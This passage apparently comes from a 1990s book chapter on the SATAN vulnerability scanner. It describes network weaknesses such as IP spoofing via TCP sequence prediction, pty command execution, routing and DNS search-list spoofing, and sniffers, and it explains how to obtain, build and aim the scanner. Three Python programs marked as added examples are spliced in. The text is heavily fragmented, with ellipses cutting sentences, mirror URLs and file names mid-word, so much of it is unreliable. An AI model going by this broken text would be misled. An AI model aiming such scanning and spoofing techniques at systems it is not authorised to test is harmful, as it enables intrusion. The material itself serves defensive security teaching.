Because the SATAN HTML server runs on the same system as the browser, the URL is never
sent over a network
...
With version 1
...

In general, exit the Web browser after running SATAN and before trying to use the browser to
connect to other Web sites
...
Web browsers that permit remote Web sites to gather information
on previous URLs represent a security problem, because they contribute to information
leakage
...
6) do not transmit URL information
...
1 and up, SATAN rejects requests that originate on hosts other than the one
that SATAN is running on, based on source IP address
...


A Modem on a TCP Port
SATAN sends a standard modem AT command to each TCP port
...

An intruder who finds a modem directly connected to the TCP port of a remote system can
use it to directly dial out
...
If a modem is
required on a TCP port, a tcp-wrapper and/or S/Key authentication should be considered
...


Passwords
Password selection is very important
...
Programs that force users to choose good passwords can help protect logins
...


Tip

A paper by Walter Belgers (Belgers, 1991) on choosing passwords is very useful
on this topic
...
win
...
nl/pub/security/UNIXpassword-security
...
Z
...


It is dangerous for a user to invoke standard telnet, rlogin, or FTP over the Internet
...
One must assume that a hacker is packet
sniffing and watching for the unencrypted transmission of passwords, as is typical in FTP,
telnet, rlogin, and rexec
...

Users should change passwords often and consider using one-time passwords (S/Key, or Opie),
ssh, SSL applications, Kerberos (tickets), or smart cards
...
Not putting them into ~ftp/etc also protects user passwords
from Crack attacks
...
Some versions of ftpd,
notably wu-ftpd, permit sublogins, where a user first logs in anonymously, gets
placed into a chrooted environment of ~ftp, then does a sublogin as that user
...
The
admin should require each user to choose a new password, clip the encrypted
version of that from the /etc/passwd field, put that in the ~ftp/etc/passwd entry, and
then require the user to select a new and different password for the regular account
...


As an administrator, there is one way to deal with protecting the NIS passwd map: run NIS
only behind a firewall
...
Guessing the domain name can be done, and programs like ypx can
help to send maps
...
Export restrictions may prevent non-U
...
users from getting programs using
DES encryption
...

There are at least four ways to deal with protecting /etc/passwd:
• Shadow password files
• Password selection enforcers
• One-time passwords
• Electronic smart cards
Shadow password files store the encrypted password in a file that is accessible only to root; the
regular /etc/passwd file is world-readable
...


Note On some Linux systems and HP-UX, the /etc/securetty lists those ttys that can be
used to log in as root
...

For Sun and other systems, the /etc/ttytab file lists all ttys
...
For other systems, /etc/login
...
Study the login man page to find out details on your system
...
Essentially, these programs run
something like Crack against the proposed new password before accepting it
...
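The following enforcer is an added example, not the book's code. It applies a constructed subset of Crack-style transformations (case folding, leet substitution, stripping of leading and trailing digits and punctuation, reversal) to a proposed password and rejects it when any form matches a dictionary word or the user name.

```python
"""A small password-selection enforcer that runs Crack-style transformations
against a proposed password before accepting it.

Added example, not the book's code.  WORDLIST stands in for a real
dictionary file, and the transformation rules are a constructed subset of
what a cracking program would try.
"""
import re

WORDLIST = {"password", "secret", "welcome", "satan", "dragon", "letmein"}
MIN_LENGTH = 8
# 0->o 1->i 4->a 3->e 5->s $->s @->a !->i 7->t
LEET = str.maketrans("01435$@!7", "oiaessait")


def crack_variants(candidate):
    """Forms a cracker would derive from the candidate: lowercase, de-leeted,
    leading/trailing digits and punctuation stripped, and each of those reversed."""
    c = candidate.lower()
    bases = {c, c.translate(LEET)}
    for b in list(bases):
        stripped = re.sub(r"^[^a-z]+|[^a-z]+$", "", b)
        bases.update({stripped, stripped.translate(LEET)})
    return bases | {b[::-1] for b in bases}


def check_password(candidate, username=""):
    """Return the reasons a proposed password is rejected; an empty list means accepted."""
    reasons = []
    if len(candidate) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    classes = sum(bool(re.search(p, candidate))
                  for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))
    if classes < 3:
        reasons.append("uses fewer than three character classes")
    variants = crack_variants(candidate)
    if username and username.lower() in variants:
        reasons.append("derived from the user name")
    if variants & WORDLIST:
        reasons.append("derived from a dictionary word")
    return reasons


if __name__ == "__main__":
    for pw in ("p@ssw0rd1", "Bkelley!9", "terces123", "Tr0ub4dor&3"):
        verdict = check_password(pw, username="bkelley") or ["accepted"]
        print(f"{pw}: {'; '.join(verdict)}")
```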
Each user has a paper (or online) printout of passwords and is required
to generate new lists occasionally
...

Another approach is to use smart cards, such as the SecurID from Security Dynamics, that
require a PIN number to be typed in and then send a password
...

If the target system has an X Windows vulnerability, the intruder can gain access to all typed
keystrokes, effectively canceling many of the preceding password security approaches
...
This prevents hackers from gaining access
to these accounts
...
The application
opens a pseudo-tty, or pty, which acts as the master and is associated with a slave tty
...

When the user types on the keyboard, the keystrokes are sent to the pty
...

The pty is described by a device file, such as /dev/pty/ttys2
...
For example:
% ll ‘pty’
crw------ 1 bkelley users 17 0x000032 Nov 20 00:51 dev/pty/ttys2
% mesg
is n
% mesg y
% ll ‘pty’
crw--w--w- 1 bkelley users 17 0x000032 Nov 20 00:51 dev/pty/ttys2
% mesg n
% ll ‘pty’
crw------ 1 bkelley users 17 0x000032 Nov 20 00:51 dev/pty/ttys2
%


The mesg command enables the user to permit other users to invoke the talk or write command to send messages or interactively talk to this user
...
notreal
...
notreal
...

The problem is that it is possible to cause commands to be executed on ptys
...
If
that owner is root, the user can gain access to root using this technique
...
The global /etc/profile (or
/etc/cshrc) should use a default of mesg n so that users are required to specifically indicate this
service
...
Unless the termcap capabilities of the remote terms permit
the ability to embed execution strings, there is no way to gain access remotely
...
gated can support many routing protocols, from
DVMRP to OSPF, but most gated implementations use RIP, which is also supported by many
hardware routers
...
This could lead to disruption of
service and facilitate other attacks
...
x, the gated
...
trustedhellogateways gateway [ gateway ]

Only the routing updates from the indicated RIP or HELLO gateways are recognized as valid
...
x and 3
...
conf file can include a trustedgateways clause to specify
the same access controls for RIP, HELLO, and ICMP redirects
...
The password consists of a quoted string, 0
to 16 bytes long
...
A
hacker with a packet sniffer could gain access to these passwords and spoof a routing packet
...
Once again, IP
spoofing by a hacker could be used to insert false routing updates
...



DNS Searchlists
By default, a hostname lookup using the DNS resolver proceeds by appending the current
domain to the hostname and attempting a lookup
...

RFC 1535 discusses vulnerabilities to this algorithm
...
conf
domain mftg
...
com
% nslookup inv
...
notreal

At this point, the resolver first tries to look up this line:
mftg
...
com
...
notreal
...
Next, the resolver tries this:
mftg
...
com
...
com

This also fails
...

A hacker within the NotReal company could apply for the domain com
...
com, perhaps
claiming that the domain oversaw the communications department
...
At this
point, the hacker could start feeding false information to the resolver, perhaps permitting trust-based attacks using
...

The appropriate way to solve this problem is by explicitly listing a search list in the resolv
...
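The following model is an added example, not the book's code. It reproduces the two resolver behaviours discussed above for the book's own names (local domain mftg.notreal.com, lookup of inv.notreal.com): the older implicit search through the parent domains, and the RFC 1535 style explicit search list. The squatted zone com.notreal.com is my reading of the text's abbreviated example and is an assumption.

```python
"""Which names does a resolver actually send to DNS for one hostname lookup?

Added example, not the book's code.  implicit_candidates models the older
resolver that appended the local domain and then each of its parents (a
simplification: where older resolvers stopped varied by version).
explicit_candidates models a resolver with an explicit search list and an
ndots threshold, the RFC 1535 fix.  Each list is the order of attempts; a
real resolver stops at the first answer.
"""


def parent_domains(domain):
    """mftg.notreal.com -> [mftg.notreal.com, notreal.com, com]."""
    labels = domain.strip(".").split(".")
    return [".".join(labels[i:]) for i in range(len(labels))]


def implicit_candidates(name, local_domain):
    """Pre-RFC 1535 behaviour: local domain, every parent, then the name as given."""
    name = name.rstrip(".")
    return [f"{name}.{d}" for d in parent_domains(local_domain)] + [name]


def explicit_candidates(name, search_list, ndots=1):
    """Explicit search list: a name with at least ndots dots is tried as given
    first; only the listed domains are ever appended, never their parents."""
    name = name.rstrip(".")
    suffixed = [f"{name}.{d.strip('.')}" for d in search_list]
    if name.count(".") >= ndots:
        return [name] + suffixed
    return suffixed + [name]


def captured_by(candidates, squatted_zone):
    """Candidate names that fall inside squatted_zone, i.e. queries an
    attacker who controls that zone would get to answer."""
    zone = squatted_zone.strip(".")
    return [c for c in candidates if c == zone or c.endswith("." + zone)]


if __name__ == "__main__":
    # Names from the book's example; the squatted zone is an assumption.
    squatted = "com.notreal.com"
    old = implicit_candidates("inv.notreal.com", "mftg.notreal.com")
    new = explicit_candidates("inv.notreal.com", ["mftg.notreal.com"])
    print("implicit search:", old, "captured:", captured_by(old, squatted))
    print("explicit search:", new, "captured:", captured_by(new, squatted))
```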


Investigating IP Spoofing
Although SATAN does not specifically investigate IP spoofing, its scans reveal vulnerabilities
involving remote shell access and other services that can be exploited using IP spoofing as the
next logical step
...
This version of IP does not include any provision for
source authentication
...

Many applications are designed to trust a packet based on the IP address of the sender
...
(This is assuming that IP source routing is turned off
...
Both of these assumptions are dangerous
...

• Spoofed IP packets were exploiting rshd/remshd by predicting TCP sequence numbers
...
A router that connects an internal
network to the Internet has at least two network ports
...
If a packet arrives from an internal IP address and is
destined for another internal IP address, the router sends it to the correct destination port
...
For example, the firewall does not allow an external user to invoke the rsh/remsh
service on an internal system by screening all requests to the shell TCP port originating from
an external address
...
All the
IP packets from all the ports were loaded into a single queue and then processed
...
Therefore, an external user just had to indicate an internal IP address to send the
packet across the router
...
The intruder
would find it difficult to carry on a TCP connection because the internal host would be
sending reply TCP packets to the internal address specified by the intruder’s fake packet
...

This is where the second problem compounded the vulnerability
...
The intruder connected
to the target system and then disconnected
...
The hacker then sent the
appropriate TCP connection request to the login or shell port
...
The external system, however, has flooded
this internal host with initialization packets, causing its response time to slow down drastically
...



The target system assumed that the ACK that arrived originated from the internal host because
it carried the correct ACK number and IP address
...

Any service that relies on IP authentication is vulnerable to the attack described here
...

The rlogind and remshd servers approve access based on a hostname that is sent in the
protocol
...
rhosts or /etc/hosts
...
Until a few years ago, no additional verification was made by the
servers
...

This call attempts to contact the DNS server and find the name corresponding to the IP
address
...
If the DNS server exists outside the administrative
domain of the user, verification of the identity of the client is not certain
...
The DNS server could be administered by the hacker and therefore provide
untrusted information
...
This vulnerability simplifies routing problems for the hacker
...
The intruder can specify the route in the
options field of the IP packet
...
The secure portmap and rpcbind
programs also defer authorization to IP addresses
...
mountd program uses the IP
address to control access to file handles if an exported file system specifies a limited access list
...
When the fact that IP spoofing is possible is combined with the list of available services,
the number of network vulnerabilities becomes large
...


Protection
Some sort of encrypted authentication scheme would provide the best form of protection to
this vulnerability
...



For the router TCP connection attack, the only protection from permitting an unauthorized
new TCP connection as indicated earlier is randomization of the sequencing numbers between
subsequent TCP connections
...
It does not completely eliminate the
possibility that the hacker could guess the sequence number, because the value has a 32-bit
range; however, it makes it much more difficult
...

This does not provide protection over hijacked connections
...
Imagine that a user used telnet to connect to
the notreal
...
Even if the telnet used some sort of encrypted authentication with
Kerberos, if the data connection took place without encryption, the intruder could insert
packets into the data stream, effectively capturing control of the user’s keyboard
...

The other solution is higher-layer authentication, using some sort of security environment
such as Kerberos, SSL, or ssh
...

The ftpd server bounce problem is fixed in vendor patches or by getting the latest wu-ftpd
program
...
The kernels can
also be modified to prevent the automatic forwarding of IP packets that arrive at the network
port but are destined for other systems
...

Another IP problem exists with regard to fragmented packets whose fragmentation boundaries
lie within TCP packet headers
...


A Long-Term Solution
The newest standard for IP, version 6, includes support for packet-level authentication
...

Broad support from router manufacturers and Unix kernel vendors is required before applications using v6 will become available and popular
...


Examining Structural Internet Problems
Unfortunately, some Internet vulnerabilities are quite difficult to fix: they involve a fundamental change in the way the Internet operates, requiring modifications that could be unacceptable
to the expected functionality of Internet applications
...
Added to this problem is the need for caching to improve the performance of the
distributed database
...
Such cache corruption can be used to
attack rlogind and rshd/remshd
...

The cache corruption can take place by adding extra resource records to replies destined for a
name server
...
Schuba and E
...
The paper calls this the “Me Too” attack
...
If SATAN would implement the fourth level of scan, “All Out,” it is
highly likely that a DNS cache corruption attack would be included
...
However,
the resulting performance drop on the DNS infrastructure would virtually eliminate its
usefulness—a major setback to the performance and usefulness of the Internet
...


Sniffers
A packet sniffer is a program that runs on a system and captures every network packet that
travels past the network interface, even if it is not destined for this system or originated on this
system
...
Recent sniffer attacks on the Internet have resulted in the disclosure of
hundreds of thousands of passwords, because many network protocols transmit the passwords
in clear text
...
Once the presence of this
application is known, packet sniffing can record packets destined for this port
...
SATAN is useful for a hacker whose goal is to locate active https ports on the
Internet
...
All cryptographic schemes use some sort of session key that is generated
based on a random number seed
...
Predictability of the random number seed can decrease the effective bit size of session
keys
...
Netscape depends on SSL and permits up to
a 128-bit session key to be used for encryption
...
The PC offers limited facilities for generating a random number: the clock
offers marginal granularity, and other variables provide little additional randomization
...
Such a limited key space could be quickly searched, resulting in
key disclosures in minutes rather than years, as had been assumed
...

It is important to clearly examine the true key size of an algorithm
...
S
...
One might
wonder about the effective key size of the skipjack algorithm, used in the Clipper chip and not
released to the public: the same government agencies that make the 64-bit claim for DES also
make an 80-bit claim for skipjack
...
The
binary program could be corrupted on the remote system with some sort of virus, or the binary
could be modified during the file transfer to your system
...
Running
these programs can open your system to attack if trojan code is embedded in the binary
...
Users should closely examine code before
compiling and running software of undetermined origin
...

However, if the source comes from a university FTP archive and no PGP signature is available,
the potential exists
...
A
PGP signature of each source file, or of a file containing md5 checksums, is the ideal way to
verify source integrity
...
A fake TCP packet containing the modified
data was inserted into the connection by hackers who monitored the connection using packet
sniffers
...
The modifications decreased the strength of the encryption, permitting users to erroneously assume greater security for the transmission of secret
information, such as credit card numbers
...
These PGP
signatures should be used to confirm the integrity of any file
...
asc files containing PGP signatures for all distributions
...
These
services are nearly always accessible to users “cruising” the Internet
...
It is quite difficult to avoid denial of service attacks
...
Nothing prevents a user from sending millions of useless e-mail messages, each one small
enough to be accepted
...
ftpd can limit the amount of disk space available to transfers, and sendmail can limit the size of an individual e-mail message, but this won’t stop a
determined attacker
...

The best remedy is to use a firewall to limit the exposure of the majority of systems to random
Internet attacks
...


PostScript Files
It is possible to embed command sequences in PostScript files
...
The safest way to view
unknown
...
That is the default action indicated in most
...
ps files
...



Rendezvous with SATAN
“‘Before we start to struggle out of here,
O master,’ I said when I was on my feet,
‘I wish you would explain some things to me
...


Getting SATAN
The CD included with this book contains SATAN
...
mcs
...
gov/pub/security

• ftp://coast ... purdue ... cso ... edu/security/satan-1 ... 1 ... Z
• ftp://ftp ... dk/pub/security/tools/satan/satan-1 ... 1 ... Z
• http://ftp ... se/pub/unix/security/satan-1 ... 1 ... Z
• ftp://ftp ... se/pub/unix/security/satan-1 ... 1 ... Z
• ftp://ftp ... edu ... 1 ... tar ... acsu ... edu/pub/security/satan-1 ... 1 ... Z
• ftp://ftp ... buffalo ... 1 ... tar ... net ... edu/pub/security/satan/satan-1 ... 1 ... Z
• ftp://ftp ... net/pub/software/unix/security/
• ftp://coombs ... edu ... wi ... nl/pub/security
• ftp://ftp ... ruu ... 1 ... tar ... cert ... de/pub/tools/net/satan/satan-1 ... 1 ... Z
• ftp://cnit ... su/pub/unix/security/satan


• ftp://ftp ... com/pub/security/satan-1 ... 1 ... Z
• ftp://ftp ... edu/pub/packages/satan/satan-1 ... 1 ... Z
• ftp://ciac ... gov/pub/ciac/sectools/unix/satan/
• ftp://ftp ... unit ... 1 ... tar ... win ... nl/pub/security/satan-1 ... 1 ... Z

After you have ftped SATAN to your system, use uncompress satan-1
...
1
...
Z (or
compress -d) and then tar xvf satan-1
...
1
...

At this point, the SATAN directory should look like this:
Changes
Makefile*
README

TODO
bin/
config/

html/
include/
perl/

perllib/
reconfig*
repent*

rules/
satan
satan
...
ps
src/

Examining the SATAN Files
A more detailed look at the files and directories included in the SATAN distribution provides
an insight into how SATAN works and how it can be extended
...
1
...
8: A man page for the command-line version of SATAN
• satan
...
paths, PERL location
• repent: Changes all occurrences of SATAN to SANTA
• Changes: List of changes to SATAN program
Note that SATAN creates a satan-1
...
1/results directory to store the results
...



The include Directory
The include directory is created only for Linux
...
SATAN creates the following two directories but
does not put any files into them
...
h, it
assumes that all the netinet files are missing and tells the user to put the netinet files from
44BSD into the following directory:
• include/netinet/

The rules Directory
The rules directory is critical to the functioning of SATAN
...
It includes the following files:
• rules/facts: Deduces new facts based on existing data
• rules/hosttype: Recognizes hosts based on banners
• rules/services: Classifies host by available services
• rules/todo: Specifies what rules to try next
• rules/trust: Classifies trust based on the database records
• rules/drop: Specifies which facts to ignore, such as NFS export cdroms

The config Directory
SATAN users need to customize the pathnames to system utilities in the appropriate files in
the config directory
...
cf, is located here
...

This directory includes the following files:
• config/paths
...
sh: Path variables for shell execution
• config/satan
...
pl: SATAN version file
• config/services: An /etc/services file, just in case


The PERLlib Directory
The PERLlib directory includes two files from the PERL5
...
000 FTP sites
...
It includes the following files:
• PERLlib/ctime
...
pl: Gets command-line options
• PERLlib/README: Explains why these PERL files are included

The bin Directory
The bin directory contains the actual executables used by SATAN to investigate remote
systems
...
All the distributed
...
Each
...

SATAN refers to each
...
Users can execute each of these PERL scripts
by hand to investigate the particular vulnerabilities
...
Users who wish to add extra security checks can create
similar files and place them here with the
...

This directory includes the following files:
• bin/boot
...
satan: Uses nslookup to gather DNS records on target
• bin/finger
...
satan: Checks for anonymous FTP and writeable home dir
• bin/nfs-chk
...
satan: Tries to execute program on rexd
• bin/rpc
...
satan: Sees whether + + is in hosts
...
satan: Gets rusersd to list users
• bin/showmount
...
satan: Tries to connect to list of TCP ports


• bin/tftp
...
satan: Looks for services on list of UDP ports
• bin/xhost
...
satan: Tries to guess the NIS domain name
• bin/faux_fping: fping wrapper that skips unresolvable hosts
• bin/get_targets: Uses fping to scan a subnet for live hosts
• bin/yp-chk
...
The PERL scripts generate HTML
pages on-the-fly, whereas the many
...
A
regular user of SATAN would never actually examine any of these files by hand, because the
initial SATAN HTML page provides links into each of these pages
...
This directory includes the following files:
• html/name
...
Explains the origin of the name “SATAN”
• html/satan
...
Generates the opening SATAN Web page
• html/satan_documentation
...
Generates the SATAN documentation Web page

The html/docs Directory
The html/docs directory contains valuable information on the internal workings of SATAN
...
rules, satan
...
db, and trust pages
...

This directory includes the following files (no descriptions are included—the filenames are
self-explanatory):
• html/docs/acknowledgements ... html
• html/docs/authors ... html
• html/docs/design ... html
• html/docs/getting_started ... html
• html/docs/references ... html
• html/docs/the_main_parts ... html
• html/docs/satan ... html
• html/docs/artwork ... html
• html/docs/FAQ ... html
• html/docs/satan ... html
• html/docs/satan ... html
• html/docs/satan ... html
• html/docs/user_interface ... html
• html/docs/admin_guide_to_cracking ... html

The html/dots Directory
The html/dots directory contains the colored GIF drawings that are used in the SATAN user
interface
...
gif
• html/dots/bluedot ... gif


• html/dots/dot ... gif
• html/dots/greendot ... gif
• html/dots/orig ... gif
• html/dots/pinkdot ... gif
• html/dots/reddot ... gif
• html/dots/yellowdot
...
(The listings are
self-explanatory, but notice that a GIF of Santa Claus is included to support the top-level
“repent” command that changes all SATAN references to SANTA references, to soothe the
concerns of users who are offended by the SATAN name):
• html/images/satan ... gif
• html/images/satan-almost-full ... gif

The html/reporting Directory
The html/reporting directory contains PERL scripts that emit HTML pages that provide
summary reports of the vulnerabilities found on targets listed in the SATAN database
...
Note the
one-to-one correspondence between these filenames and the report screens found in SATAN:
the report “SATAN Information by Subnet” is generated by satan_info_subnet
...
pl-
...
pl-
...
pl
• html/reporting/satan_info_subnet ... pl
• html/reporting/satan_severity_types ... pl
• html/reporting/satan_results_danger ... pl
• html/reporting/satan_info_OSclass ... pl
• html/reporting/satan_info_servers ... pl
• html/reporting/satan_info_trusting ... pl
• html/reporting/satan_info_host ... pl
• html/reporting/satan_info_clients ... pl
• html/reporting/satan_results_domain ... pl
• html/reporting/satan_results_trusted ... pl

The html/running Directory
The html/running directory contains the two PERL scripts that begin and control the SATAN
scans:
• html/running/satan_run_form: Runs in response to the selection of SATAN Target Selection
  from the SATAN Control Panel
• html/running/satan_run_action: Executes the SATAN scan and collects the data when the
  previous SATAN Run Form screen’s Start the scan field is selected

The html/tutorials Directory
The html/tutorials directory contains useful Web pages for understanding SATAN and the
vulnerabilities that SATAN finds (the filenames are self-explanatory):
• html/tutorials/vulnerability_tutorials.html
• html/tutorials/first_time/learning_to_use.html
• html/tutorials/first_time/scanning.html
• html/tutorials/vulnerability/NFS_export_via_portmapper.html
• html/tutorials/vulnerability/REXD_access.html
• html/tutorials/vulnerability/remote_shell_access.html
• html/tutorials/vulnerability/unrestricted_X_server_access.html
• html/tutorials/vulnerability/Sendmail_vulnerabilities.html
• html/tutorials/vulnerability/unrestricted_modem.html


The html/admin Directory
The html/admin directory contains the PERL scripts that permit a user to dynamically
configure the satan.cf file.
• …

The html/data Directory
SATAN stores the results of scans into databases using a standard database record format.
The files in this directory create the SATAN Data Management screen and execute the actions
requested from that screen:
• html/data/satan_data_form: Displays the SATAN Data Management Web page
• html/data/satan_merge_action: Opens the requested SATAN database and merges it with
  another
• …

The src Directory
… These are written in C for increased speed and compatibility.


The src/boot Directory
The boot program generates an rpc call to the target system requesting the BOOTPARAM
service to get the NIS domain name. … .satan only if the remote portmap listing indicates the
bootparam service:
• src/boot/Makefile
• …
… .x file to generate the RPC stubs to support boot.

The src/misc Directory
The rex program makes a simple request to the remote rexd to prove that access is possible.
The safe_finger program is a version of finger that prevents returning fingerd information
from causing harm.

This directory includes the following files:
• src/misc/Makefile
• …
• src/misc/md5c: Contains support code for md5
• …
• src/misc/sys_socket: Replaces PERL’s socket
• …
The src/nfs-chk Directory
This directory includes the following files:
• src/nfs-chk/Makefile
• src/nfs-chk/mount.c
• src/nfs-chk/nfs_prot…

The src/port_scan Directory
These two programs scan an indicated target over an indicated range of ports by attempting to
connect to the ports on the target.
• …
• src/port_scan/find_addr.h
• src/port_scan/strerror.c
• src/port_scan/non_blocking.c
• src/port_scan/print_data.c
• src/port_scan/tcp_scan.c
• src/port_scan/udp_scan…

The src/fping Directory
This program is a replacement for the standard ping program and features the capability to more
quickly scan a number of remote hosts to determine whether these hosts are alive.
• …


• src/fping/fping.VMS
• src/fping/AUTHOR

The src/rpcgen Directory
The src/rpcgen directory contains the source for the rpcgen program, a utility created by Sun
that creates rpc stub files based on an … The rpcgen utility is shipped on many systems, but
SATAN requires it to run, so the creators of SATAN included the source, just in case.

This directory includes the following files:
• src/rpcgen/Makefile
• src/rpcgen/rpc_clntout.c
• src/rpcgen/rpc_hout.c
• src/rpcgen/rpc_parse.h
• src/rpcgen/rpc_scan.h
• src/rpcgen/rpc_svcout.c
• src/rpcgen/rpc_util…

The src/yp-chk Directory
The yp-chk program attempts to see if an NIS map is available and prints the first record of
that map if it is available.
• …
• src/yp-chk/yp-chk…

The perl Directory
This directory includes the following files:
• perl/config: Rewrites the satan…
• …
• perl/run-satan: Sets up list of targets, executes scans against targets, collects facts,
  processes todo information, and saves data
• perl/satan-data: Includes data management routines
• perl/services: Classifies host by services used and provided
• perl/severities: Classifies vulnerabilities
• perl/shell: Runs a command and uses a timeout to ensure that it finishes
• perl/socket: Executes sys_socket binary
• perl/subnets: Sifts subnet information
• perl/suser: Checks if SATAN is running as root
• perl/targets: Generates target lists, executes target probes, and saves scan information
• perl/todo: Stores and processes information about hosts discovered while scanning a
  target
• perl/trust: Maintains trust statistics
• perl/status: Maintains time, date, and status file

Note: PERL 5 … PERL 5 … cis … edu/pub/gnu/mirror/perl5 … tar …



Building SATAN
Even though SATAN consists of a large number of PERL, C, and HTML files, building SATAN
is quite straightforward and quick. (SATAN’s only possible weakness could be its speed—as a
result of the large number of PERL scripts and modularity, SATAN is not as fast as a comparable
monolithic binary.) The entire process takes only a few minutes.

Edit the paths.sh files in config/ to point to the actual location of utilities on your system.
Edit the config/satan… Specifically, you should consider adding entries to $only_attack_these
and $dont_attack_these. For example, you might want to run scans only against systems inside
the notreal.com domain. … .cf from within SATAN using the SATAN Configuration
Management screen.

Run the reconfig script. … .00x and a Web browser. … .pl file to point to the Web browser
of choice.

… You need to specify a system type, such as irix5. The authors of SATAN recommend that
you unset proxy environment variables or browser proxy settings.

su or log in to root. Run the satan script. … .pl, and the Web browser to talk to this HTML
server.

To use SATAN from the command line, you must list command-line arguments as indicated
by the satan… Note that the authors recommend against using the command-line version of
SATAN, because the user interface involves many command-line arguments that can be
somewhat confusing.


Using SATAN’s HTML Interface
The interactive version of SATAN consists of a sequence of HTML pages that are viewed
through the Web browser. … Most screens give a link back to the SATAN Control Panel. … 8.…

There you find links to HTML pages that enable you to do the following:
• Manage the data gathered by SATAN
• Choose target systems and run scans
• Generate reports and analyze data
• Modify the default configuration for searches
• Gain access to SATAN’s documentation and tutorials

Figure 8.…

In addition to the major options listed, a few links permit the user to FTP the latest version of
SATAN from a Dutch FTP archive, to change the name of the program to SANTA (if the
name SATAN offends you), to find information about the artwork in the program, and to find
information about the authors of the program.

Data Management
The default name of the database file is satan-data. … If you choose the SATAN Data
Management option from the SATAN Control Panel, your Web browser displays the screen
shown in figure 8.… The screen shows you the names of the existing databases and enables you
to do the following:
• Open an existing database …
• Merge current data with an existing database …

Figure 8.2 The SATAN Data Management screen

… 8.2 includes a TCP port number and a 32-byte value. … .pl) is listening on, and the 32-byte
value is the password that permits access.



Target Selection
When you are ready to run a SATAN scan, choose the SATAN Target Selection option on the
SATAN Control Panel. … 8.3—the SATAN Target Selection screen … :
• …cup….com)
• Whether SATAN should scan all hosts on the same subnet
• The level of the scan (light, normal, or heavy)

Figure 8.…

After specifying this information, you can now initiate the scan. … .satan scripts) being
executed, along with parameters, on the SATAN Data Collection screen shown in figure 8.…
Note that each component scan program is invoked using the timeout program.

The signal that the timeout program sends, and the timeout values, can be configured using
the satan.… Notice from figure 8.…



Figure 8.…

After the scan completes, you can select the View Primary Target Results option from the
SATAN Data Collection screen to get to the SATAN Results screen, shown in figure 8.… The
SATAN Results screen provides a summary of information about the host, as well as a list of
vulnerability information.


Reporting and Data Analysis
After running scans on several hosts, you might want to generate reports or analyze the data
from multiple hosts. … 8.6 …

Figure 8.5 The SATAN Results screen

Figure 8.6 The SATAN Reporting and Analysis screen

By selecting the By Type of Vulnerability option on the SATAN Reporting and Analysis screen,
you get the SATAN Vulnerabilities - By Type report shown in figure 8.… This screen is very
useful if you are trying to eliminate security problems of a certain type.

Figure 8.…


Configuration Management
By choosing the SATAN Configuration Management option from the SATAN Control Panel,
you can modify the configuration set in satan.… Using the screens shown in figures 8.8 and
8.9, you can modify the following parameters:
• The directory to keep the data in
• The default probe level
• The timeout value for each network probe
• The kill signal sent to tool processes at timeout
• The maximum proximity amount (maximal proximity)
• The proximity descent value
• Whether to stop when the probe level hits 0
• Whether to scan the entire subnet of the target
• Whether the intruder system is trusted

• Limits on what hosts to probe (by domain name or subnet address)
• Limits on what hosts cannot be probed
• Two workarounds: one tells SATAN to use nslookup (for NIS environments) or
  gethostbyname() lookups (for DNS environments), and one that tells SATAN to use or
  not use ping (because ping depends on ICMP, environments where ICMP does not
  work will want to avoid ICMP—not many systems fall into this category)

Figure 8.8 The SATAN Configuration Management screen, part 1

Figure 8.9 The SATAN Configuration Management screen, part 2

… SATAN treats any host information gained from a scan of a single target system as having
a proximity of 1 to the target system. … .rhosts/hosts… If you scan with a maximal proximity
setting of 2, the number of hosts scanned can become quite large. … You can imagine the
exponential growth involved with SATAN scans that use a maximal proximity setting greater
than 2.

The proximity descent field can be used to decrease the intensity of the scan as SATAN moves
the scan out to less proximate hosts. … The target is scanned at the heavy level, the hosts at
proximity of 1 are scanned at the normal level, and the hosts at proximity of 2 are scanned at
the light level. … For example, if the target was 192….13….12… … 1 to 192….13… (Note
that x.x.x.255 are typically reserved for broadcast and are not assigned to individual hosts.)
… 10 …

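As an added example (not code from the book or from SATAN itself), the following Python models how the maximal proximity, proximity descent, and $only_attack_these / $dont_attack_these settings described above bound the set of hosts a scan touches; the trust graph, host names, and the suffix/prefix scope-matching rule are constructed assumptions, not SATAN's actual matching code.

```python
from collections import deque

# Probe levels as satan.cf numbers them: 0 = light, 1 = normal, 2 = heavy.
LEVELS = ("light", "normal", "heavy")


def in_scope(host, only_attack_these=(), dont_attack_these=()):
    """Scope filter in the spirit of $only_attack_these / $dont_attack_these.
    Assumed matching rule: an entry is a domain suffix ("notreal.com") or a
    dotted address prefix ("192.168.13."); the deny list always wins."""
    def matches(entry):
        return host.startswith(entry) if entry[:1].isdigit() else host.endswith(entry)
    if any(matches(e) for e in dont_attack_these):
        return False
    return not only_attack_these or any(matches(e) for e in only_attack_these)


def plan_scan(trust_graph, target, max_proximity, descent, start_level=2,
              continue_below_zero=False, only_attack_these=(), dont_attack_these=()):
    """Walk outward from the primary target over the hosts each scan reveals
    (its .rhosts, hosts.equiv and NFS clients; here a constructed graph).
    Returns {host: (proximity, level name)} for every host that would be
    probed.  The level drops by `descent` per proximity step; a host whose
    level would fall below 0 is skipped unless continue_below_zero is set,
    in which case it is probed at the light level (an assumed reading of
    the "stop when the probe level hits 0" option)."""
    plan = {}
    queue = deque([(target, 0)])
    while queue:
        host, prox = queue.popleft()
        if host in plan or prox > max_proximity:
            continue
        if not in_scope(host, only_attack_these, dont_attack_these):
            continue                      # never probed, so never expanded
        level = start_level - descent * prox
        if level < 0:
            if not continue_below_zero:
                continue
            level = 0
        plan[host] = (prox, LEVELS[min(level, len(LEVELS) - 1)])
        for neighbour in trust_graph.get(host, ()):
            queue.append((neighbour, prox + 1))
    return plan


def hosts_per_proximity(plan):
    """How many hosts the scan touches at each proximity ring."""
    counts = {}
    for prox, _level in plan.values():
        counts[prox] = counts.get(prox, 0) + 1
    return dict(sorted(counts.items()))


# Constructed trust graph: host -> hosts learned from scanning it.  The
# partner domain shows how a scan can wander off the organization's own network.
TRUST = {
    "m2.notreal.com": ["mailhub.notreal.com", "fs1.notreal.com"],
    "mailhub.notreal.com": ["gw.partner.example", "m3.notreal.com"],
    "fs1.notreal.com": ["m3.notreal.com", "m4.notreal.com"],
    "m3.notreal.com": ["m5.notreal.com"],
    "gw.partner.example": ["core.partner.example"],
}

if __name__ == "__main__":
    for max_prox in range(0, 4):
        plan = plan_scan(TRUST, "m2.notreal.com", max_prox, descent=1,
                         only_attack_these=("notreal.com",))
        print(max_prox, hosts_per_proximity(plan))
```
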

Figure 8.…



Documentation
The following are the three most useful parts of the documentation:
• SATAN Reference
